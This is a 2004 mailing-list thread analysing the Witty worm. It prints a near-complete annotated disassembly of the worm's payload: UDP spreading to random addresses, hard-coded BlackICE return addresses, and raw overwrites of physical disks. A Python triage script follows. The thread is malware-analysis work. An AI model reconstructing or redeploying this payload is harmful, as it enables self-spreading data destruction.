Full Disclosure mailing list archives
RE: Any dissasemblies of the Witty worm yet?
From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Sat, 20 Mar 2004 23:47:21 -0500
From the quick analysis of this worm (retrieved from
http://isc.incidents.org/diary.html?date=2004-03-20), it seems that it bears strange similarity with SQL Slammer for the following points:

1. It uses the same "push ascii" format as SQL Slammer, for example "push 6B636F73h" in this worm.
2. It uses hard-coded import addresses (listed below) as SQL Slammer.
3. If someone can trace the origin of this worm, it might shed light on the origin of SQL Slammer as well?
4. When SQL Slammer hit, some suspected that LION (http://www.cnhonker.com/index.php) did it and he refused the credit. From the latest articles on the http://www.cnhonker.com/index.php website, LION is probably not the person who released SQL Slammer, if and only if the writer of the "witty" worm is the same writer for SQL Slammer, since Lion's methods for importing functions are much more sophisticated than the hard-coded import addresses shown in this worm.

If I have time, I might provide a run-time analysis (and disassembly) of this worm within the context of blackd.exe. For now, just match up the addresses used in the disassembly by Kostya.
Peter Huang
http://www.ossecurity.ca/

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Analyze exploit file c:\temp\temp.bin with size 0000040f
Found: offset 000000ef value 5e0d409c in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d409c: Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA
Found: offset 00000106 value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress
Found: offset 00000121 value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress
Found: offset 0000014a value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress
Found: offset 00000164 value 5e0d409c in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d409c: Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA
Found: offset 0000017f value 5e0d4098 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4098: Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress
Found: offset 00000241 value 5e0d40dc in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d40dc: Rva 000d40dc is address of import fx: KERNEL32.dll!CreateFileA
Found: offset 0000027a value 5e0d40c4 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d40c4: Rva 000d40c4 is address of import fx: KERNEL32.dll!SetFilePointer
Found: offset 00000294 value 5e0d4094 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4094: Rva 000d4094 is address of import fx: KERNEL32.dll!WriteFile
Found: offset 0000029c value 5e0d4038 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e0d4038: Rva 000d4038 is address of import fx: KERNEL32.dll!CloseHandle
EntryPoint Info:
Found: offset 000002a7 value 5e077663 in module C:\Program Files\ISS\BlackICE\iss-pam1.dll
Datails about 5e077663: Rva 00077663 value 0759e4ff
5E077663: FF E4 jmpn esp
-----Original Message-----
From: Kostya Kortchinsky [mailto:kostya.kortchinsky () renater fr]
Sent: Saturday, March 20, 2004 12:39 PM
To: bugtraq () securityfocus com
Subject: Re: Any dissasemblies of the Witty worm yet?

Here is some preliminary work, I don't claim it to be exact, since the API calls are guessed at the moment (I still have to get BlackICE), but it should give a pretty good idea of how the thing works. The WriteFile might be ReadFile (which is the way Symantec sees it in their analysis), but in my opinion the GENERIC_WRITE flag (and the fact the memory at 0x5e000000 might be a code section, then not writeable) makes me think it writes arbitrary places of random physical disks - with the consequences one can imagine. Correct me if I am wrong, I would like to receive feedback about this.

Regards,
Kostya Kortchinsky
CERT RENATER

Nicholas Weaver wrote:
Has anyone done a disassembly of the "Witty" worm yet?
http://isc.incidents.org/diary.html?date=2004-03-20
http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
using the http://seclists.org/lists/bugtraq/2004/Mar/0181.html recent bug in BlackICE/RealSecure?
We are seeing a lot of activity from this worm, although even a small infection would generate a LOT of traffic (a side-effect of bandwidth-limited worms, such as single-packet UDP worms).
Thanks.

seg000:000000D1 ; ---------------------------------------------------------------------------
seg000:000000D1
seg000:000000D1 loc_D1:                                 ; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7                   mov     edi, esp
seg000:000000D3 8B 7F 14                mov     edi, [edi+14h]
seg000:000000D6 83 C7 08                add     edi, 8
seg000:000000D9 81 C4 E8 FD FF FF       add     esp, 0FFFFFDE8h
seg000:000000DF 31 C9                   xor     ecx, ecx
seg000:000000E1 66 B9 33 32             mov     cx, 3233h       ; 32
seg000:000000E5 51                      push    ecx
seg000:000000E6 68 77 73 32 5F          push    5F327377h       ; ws2_
seg000:000000EB 54                      push    esp
seg000:000000EC                         db 3Eh
seg000:000000EC 3E FF 15 9C 40 0D+      call    dword ptr ds:5E0D409Ch ; Probably LoadLibrary
seg000:000000F3 89 C3                   mov     ebx, eax
seg000:000000F5 31 C9                   xor     ecx, ecx
seg000:000000F7 66 B9 65 74             mov     cx, 7465h       ; et
seg000:000000FB 51                      push    ecx
seg000:000000FC 68 73 6F 63 6B          push    6B636F73h       ; sock
seg000:00000101 54                      push    esp
seg000:00000102 53                      push    ebx
seg000:00000103                         db 3Eh
seg000:00000103 3E FF 15 98 40 0D+      call    dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:0000010A 6A 11                   push    11h             ; IPPROTO_UDP
seg000:0000010C 6A 02                   push    2               ; SOCK_DGRAM
seg000:0000010E 6A 02                   push    2               ; AF_INET
seg000:00000110 FF D0                   call    eax             ; socket()
seg000:00000112 89 C6                   mov     esi, eax
seg000:00000114 31 C9                   xor     ecx, ecx
seg000:00000116 51                      push    ecx
seg000:00000117 68 62 69 6E 64          push    646E6962h       ; bind
seg000:0000011C 54                      push    esp
seg000:0000011D 53                      push    ebx
seg000:0000011E                         db 3Eh
seg000:0000011E 3E FF 15 98 40 0D+      call    dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:00000125 31 C9                   xor     ecx, ecx
seg000:00000127 51                      push    ecx
seg000:00000128 51                      push    ecx
seg000:00000129 51                      push    ecx             ; sin.sin_addr.s_addr = INADDR_ANY
seg000:0000012A 81 E9 FE FF F0 5F       sub     ecx, 5FF0FFFEh  ; 0xa00f0002
seg000:00000130 51                      push    ecx             ; sin.sin_family = AF_INET
seg000:00000130                                                 ; sin.sin_port = htons(4000)
seg000:00000131 89 E1                   mov     ecx, esp
seg000:00000133 6A 10                   push    10h             ; sizeof(struct sockaddr)
seg000:00000135 51                      push    ecx             ; &sin
seg000:00000136 56                      push    esi             ; s
seg000:00000137 FF D0                   call    eax             ; bind()
seg000:00000139 31 C9                   xor     ecx, ecx
seg000:0000013B 66 B9 74 6F             mov     cx, 6F74h       ; to
seg000:0000013F 51                      push    ecx
seg000:00000140 68 73 65 6E 64          push    646E6573h       ; send
seg000:00000145 54                      push    esp
seg000:00000146 53                      push    ebx
seg000:00000147                         db 3Eh
seg000:00000147 3E FF 15 98 40 0D+      call    dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:0000014E 89 C3                   mov     ebx, eax
seg000:00000150 83 C4 3C                add     esp, 3Ch
seg000:00000153
seg000:00000153 loc_153:                                ; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9                   xor     ecx, ecx
seg000:00000155 51                      push    ecx
seg000:00000156 68 65 6C 33 32          push    32336C65h       ; el32
seg000:0000015B 68 6B 65 72 6E          push    6E72656Bh       ; kern
seg000:00000160 54                      push    esp
seg000:00000161                         db 3Eh
seg000:00000161 3E FF 15 9C 40 0D+      call    dword ptr ds:5E0D409Ch ; Probably LoadLibrary
seg000:00000168 31 C9                   xor     ecx, ecx
seg000:0000016A 51                      push    ecx
seg000:0000016B 68 6F 75 6E 74          push    746E756Fh       ; ount
seg000:00000170 68 69 63 6B 43          push    436B6369h       ; ickC
seg000:00000175 68 47 65 74 54          push    54746547h       ; GetT
seg000:0000017A 54                      push    esp
seg000:0000017B 50                      push    eax
seg000:0000017C                         db 3Eh
seg000:0000017C 3E FF 15 98 40 0D+      call    dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:00000183 FF D0                   call    eax             ; GetTickCount()
seg000:00000185 89 C5                   mov     ebp, eax
seg000:00000187 83 C4 1C                add     esp, 1Ch
seg000:0000018A 31 C9                   xor     ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF       sub     ecx, 0FFFFB1E0h ; 0x4e20
seg000:00000192
seg000:00000192 loc_192:                                ; CODE XREF: seg000:000001F8j
seg000:00000192                                         ; seg000:00000255j
seg000:00000192 51                      push    ecx
seg000:00000193 31 C0                   xor     eax, eax
seg000:00000195 2D 03 BC FC FF          sub     eax, 0FFFCBC03h ; 0x343fd
seg000:0000019A F7 E5                   mul     ebp
seg000:0000019C 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh ; 0x269ec3
seg000:000001A1 89 C1                   mov     ecx, eax        ; rand() function, without the 0x7fff mask, shift coming afterwards
seg000:000001A1                                                 ; srand() done with GetTickCount()
seg000:000001A3 31 C0                   xor     eax, eax
seg000:000001A5 2D 03 BC FC FF          sub     eax, 0FFFCBC03h
seg000:000001AA F7 E1                   mul     ecx
seg000:000001AC 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh
seg000:000001B1 89 C5                   mov     ebp, eax
seg000:000001B3 31 D2                   xor     edx, edx
seg000:000001B5 52                      push    edx
seg000:000001B6 52                      push    edx
seg000:000001B7 C1 E9 10                shr     ecx, 10h
seg000:000001BA 66 89 C8                mov     ax, cx
seg000:000001BD 50                      push    eax             ; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0                   xor     eax, eax
seg000:000001C0 2D 03 BC FC FF          sub     eax, 0FFFCBC03h
seg000:000001C5 F7 E5                   mul     ebp
seg000:000001C7 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh
seg000:000001CC 89 C5                   mov     ebp, eax
seg000:000001CE 30 E4                   xor     ah, ah
seg000:000001D0 B0 02                   mov     al, 2
seg000:000001D2 50                      push    eax             ; to.sin_family = AF_INET
seg000:000001D2                                                 ; to.sin_port = rand()
seg000:000001D3 89 E0                   mov     eax, esp
seg000:000001D5 6A 10                   push    10h             ; sizeof(struct sockaddr)
seg000:000001D7 50                      push    eax             ; &to
seg000:000001D8 31 C0                   xor     eax, eax
seg000:000001DA 50                      push    eax             ; flags
seg000:000001DB 2D 03 BC FC FF          sub     eax, 0FFFCBC03h
seg000:000001E0 F7 E5                   mul     ebp
seg000:000001E2 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh
seg000:000001E7 89 C5                   mov     ebp, eax
seg000:000001E9 C1 E8 17                shr     eax, 17h
seg000:000001EC 80 C4 03                add     ah, 3
seg000:000001EF 50                      push    eax             ; len = 0x300 + (rand() >> 7)
seg000:000001F0 57                      push    edi             ; buf
seg000:000001F1 56                      push    esi             ; s
seg000:000001F2 FF D3                   call    ebx             ; sendto()
seg000:000001F4 83 C4 10                add     esp, 10h
seg000:000001F7 59                      pop     ecx
seg000:000001F8 E2 98                   loop    loc_192
seg000:000001FA 31 C0                   xor     eax, eax
seg000:000001FC 2D 03 BC FC FF          sub     eax, 0FFFCBC03h
seg000:00000201 F7 E5                   mul     ebp
seg000:00000203 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh
seg000:00000208 89 C5                   mov     ebp, eax
seg000:0000020A C1 E8 10                shr     eax, 10h
seg000:0000020D 80 E4 07                and     ah, 7
seg000:00000210 80 CC 30                or      ah, 30h         ; 0x30 | (rand() & 7)
seg000:00000213 B0 45                   mov     al, 45h ; 'E'   ; E
seg000:00000215 50                      push    eax
seg000:00000216 68 44 52 49 56          push    56495244h       ; DRIV
seg000:0000021B 68 49 43 41 4C          push    4C414349h       ; ICAL
seg000:00000220 68 50 48 59 53          push    53594850h       ; PHYS
seg000:00000225 68 5C 5C 2E 5C          push    5C2E5C5Ch       ; \\.\
seg000:00000225                                                 ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0                   mov     eax, esp
seg000:0000022C 31 C9                   xor     ecx, ecx
seg000:0000022E 51                      push    ecx             ; NULL
seg000:0000022F B2 20                   mov     dl, 20h ; ' '
seg000:00000231 C1 E2 18                shl     edx, 18h
seg000:00000234 52                      push    edx             ; FILE_FLAG_NO_BUFFERING (0x20000000)
seg000:00000235 6A 03                   push    3               ; OPEN_EXISTING
seg000:00000237 51                      push    ecx             ; NULL
seg000:00000238 6A 03                   push    3               ; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2                   shl     edx, 1
seg000:0000023C 52                      push    edx             ; GENERIC_WRITE (0x40000000)
seg000:0000023D 50                      push    eax             ; lpFileName
seg000:0000023E                         db 3Eh
seg000:0000023E 3E FF 15 DC 40 0D+      call    dword ptr ds:5E0D40DCh ; Probably CreateFile
seg000:00000245 83 C4 14                add     esp, 14h
seg000:00000248 31 C9                   xor     ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF       sub     ecx, 0FFFFB1E0h ; 0x4e20
seg000:00000250 3D FF FF FF FF          cmp     eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF       jz      loc_192
seg000:0000025B 56                      push    esi             ; (saving socket)
seg000:0000025C 89 C6                   mov     esi, eax
seg000:0000025E 31 C0                   xor     eax, eax
seg000:00000260 50                      push    eax             ; FILE_BEGIN
seg000:00000261 50                      push    eax             ; NULL
seg000:00000262 2D 03 BC FC FF          sub     eax, 0FFFCBC03h
seg000:00000267 F7 E5                   mul     ebp
seg000:00000269 2D 3D 61 D9 FF          sub     eax, 0FFD9613Dh
seg000:0000026E 89 C5                   mov     ebp, eax
seg000:00000270 D1 E8                   shr     eax, 1
seg000:00000272 66 89 C8                mov     ax, cx
seg000:00000275 50                      push    eax             ; (rand() << 15) | 0x4e20
seg000:00000276 56                      push    esi             ; hFile
seg000:00000277                         db 3Eh
seg000:00000277 3E FF 15 C4 40 0D+      call    dword ptr ds:5E0D40C4h ; Probably SetFilePointer
seg000:00000277 5E                                              ; (really not sure about this one)
seg000:0000027E 31 C9                   xor     ecx, ecx
seg000:00000280 51                      push    ecx             ; 0
seg000:00000281 89 E2                   mov     edx, esp
seg000:00000283 51                      push    ecx             ; NULL
seg000:00000284 52                      push    edx             ; lpNumberOfBytesWritten
seg000:00000285 B5 80                   mov     ch, 80h ; 'Ç'
seg000:00000287 D1 E1                   shl     ecx, 1
seg000:00000289 51                      push    ecx             ; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E                   mov     cl, 5Eh ; '^'
seg000:0000028C C1 E1 18                shl     ecx, 18h
seg000:0000028F 51                      push    ecx             ; lpBuffer (0x5e000000)
seg000:00000290 56                      push    esi             ; hFile
seg000:00000291                         db 3Eh
seg000:00000291 3E FF 15 94 40 0D+      call    dword ptr ds:5E0D4094h ; Probably WriteFile
seg000:00000298 56                      push    esi             ; hObject
seg000:00000299                         db 3Eh
seg000:00000299 3E FF 15 38 40 0D+      call    dword ptr ds:5E0D4038h ; Probably CloseHandle
seg000:000002A0 5E                      pop     esi
seg000:000002A1 5E                      pop     esi             ; (restoring socket)
seg000:000002A2 E9 AC FE FF FF          jmp     loc_153
seg000:000002A2 ; ---------------------------------------------------------------------------
seg000:000002A7 63 76 07 5E             dd 5E077663h
seg000:000002AB ; ---------------------------------------------------------------------------
seg000:000002AB E9 21 FE FF FF          jmp     loc_D1
seg000:000002AB ; ---------------------------------------------------------------------------
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
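As an added example that is not part of the thread (neither Peter Huang's tool nor Kostya's listing), the script below performs the two static checks both posts rely on when comparing this worm with SQL Slammer: decoding the strings a payload assembles on the stack with "push ascii" immediates (the `push 6B636F73h` / `mov cx, 7465h` pattern), and matching every 32-bit value in the blob against a table of known module addresses (the hard-coded IAT slots and the `jmp esp` return address). The address table is copied from the tool output above; the sample bytes are constructed from the opcode bytes in the listing; the assumption is that the table is hand-written, where a production tool would read the import directory from the DLL's PE headers.

```python
"""Static triage of a position-independent x86 payload (added example).

Two checks drawn from the thread: (1) recover strings built with
`push imm32` (68 xx xx xx xx) plus the `mov cx, imm16; push ecx` tail,
and (2) flag dwords that land on known import-table slots or on a known
return address inside a specific build of a target module.
"""
import struct
from typing import Dict, List, Tuple

# Addresses inside iss-pam1.dll as reported in the tool output above.
# ASSUMPTION: only the entries named in the post are listed; a real tool
# would parse the module's PE import directory to fill this table.
KNOWN_ADDRESSES: Dict[int, str] = {
    0x5E0D409C: "KERNEL32.dll!GetModuleHandleA (IAT slot)",
    0x5E0D4098: "KERNEL32.dll!GetProcAddress (IAT slot)",
    0x5E0D40DC: "KERNEL32.dll!CreateFileA (IAT slot)",
    0x5E0D40C4: "KERNEL32.dll!SetFilePointer (IAT slot)",
    0x5E0D4094: "KERNEL32.dll!WriteFile (IAT slot)",
    0x5E0D4038: "KERNEL32.dll!CloseHandle (IAT slot)",
    0x5E077663: "iss-pam1.dll+0x77663: jmp esp (return address)",
}

# Constructed sample: opcode bytes taken from the listing, offsets noted.
SAMPLE = bytes.fromhex(
    "31C9"              # 0   xor ecx, ecx
    "66B93332"          # 2   mov cx, 3233h            ; "32"
    "51"                # 6   push ecx
    "687773325F"        # 7   push 5F327377h           ; "ws2_"
    "54"                # 12  push esp
    "3EFF159C400D5E"    # 13  call dword ptr ds:5E0D409Ch
    "89C3"              # 20  mov ebx, eax
    "31C9"              # 22  xor ecx, ecx
    "66B96574"          # 24  mov cx, 7465h            ; "et"
    "51"                # 28  push ecx
    "68736F636B"        # 29  push 6B636F73h           ; "sock"
    "5453"              # 34  push esp / push ebx
    "3EFF1598400D5E"    # 36  call dword ptr ds:5E0D4098h
    "6A116A026A02FFD0"  # 43  push 11h / push 2 / push 2 / call eax
    "89C6"              # 51  mov esi, eax
    "31C951"            # 53  xor ecx, ecx / push ecx (terminator)
    "6862696E64"        # 56  push 646E6962h           ; "bind"
    "5453"              # 61  push esp / push ebx
    "3EFF1598400D5E"    # 63  call dword ptr ds:5E0D4098h
    "B04550"            # 70  mov al, 45h / push eax
    "6844524956"        # 73  push 56495244h           ; "DRIV"
    "684943414C"        # 78  push 4C414349h           ; "ICAL"
    "6850485953"        # 83  push 53594850h           ; "PHYS"
    "685C5C2E5C"        # 88  push 5C2E5C5Ch           ; "\\.\"
    "89E0"              # 93  mov eax, esp
    "3EFF15DC400D5E"    # 95  call dword ptr ds:5E0D40DCh
    "6376075E"          # 102 dd 5E077663h (return address)
)


def _printable(chunk: bytes) -> bool:
    """True if every byte is printable ASCII (space through tilde)."""
    return len(chunk) > 0 and all(0x20 <= b < 0x7F for b in chunk)


def find_pushed_strings(code: bytes) -> List[str]:
    """Decode strings assembled tail-first with push immediates.

    A run of fragments is reversed to read in natural order; any byte that
    is not part of the pattern ends the run.  Heuristic only: a stray 0x68
    followed by four printable bytes is reported as well.
    """
    found: List[str] = []
    run: List[str] = []
    i = 0
    while i < len(code):
        # push imm32 with a printable immediate
        if code[i] == 0x68 and i + 5 <= len(code) and _printable(code[i + 1:i + 5]):
            run.append(code[i + 1:i + 5].decode("ascii"))
            i += 5
            continue
        # mov cx, imm16 ; push ecx  (two-character tail of a string)
        if (code[i:i + 2] == b"\x66\xB9" and i + 5 <= len(code)
                and _printable(code[i + 2:i + 4]) and code[i + 4] == 0x51):
            run.append(code[i + 2:i + 4].decode("ascii"))
            i += 5
            continue
        if run:
            found.append("".join(reversed(run)))
            run = []
        i += 1
    if run:
        found.append("".join(reversed(run)))
    return found


def find_address_refs(code: bytes, table: Dict[int, str]) -> List[Tuple[int, int, str]]:
    """Return (offset, value, label) for each little-endian dword in `code`
    that matches `table`; such hard-coded addresses tie the payload to one
    specific build of the module, which is the fingerprint the thread uses."""
    hits: List[Tuple[int, int, str]] = []
    for off in range(len(code) - 3):
        value = struct.unpack_from("<I", code, off)[0]
        if value in table:
            hits.append((off, value, table[value]))
    return hits


def triage(code: bytes) -> Dict[str, list]:
    """Run both checks and return the combined report."""
    return {"strings": find_pushed_strings(code),
            "refs": find_address_refs(code, KNOWN_ADDRESSES)}


if __name__ == "__main__":
    report = triage(SAMPLE)
    print("strings built on the stack:", report["strings"])
    for off, value, label in report["refs"]:
        print(f"offset {off:08x} value {value:08x} -> {label}")
```

Running the script against the constructed sample reports ws2_32, socket, bind and the \\.\PHYSICALDRIV prefix (the drive digit is produced at run time, so it never appears as an immediate), and lists the five hard-coded address references with the same labels Peter's tool prints. Point `triage()` at the bytes of a captured payload to get the same two views.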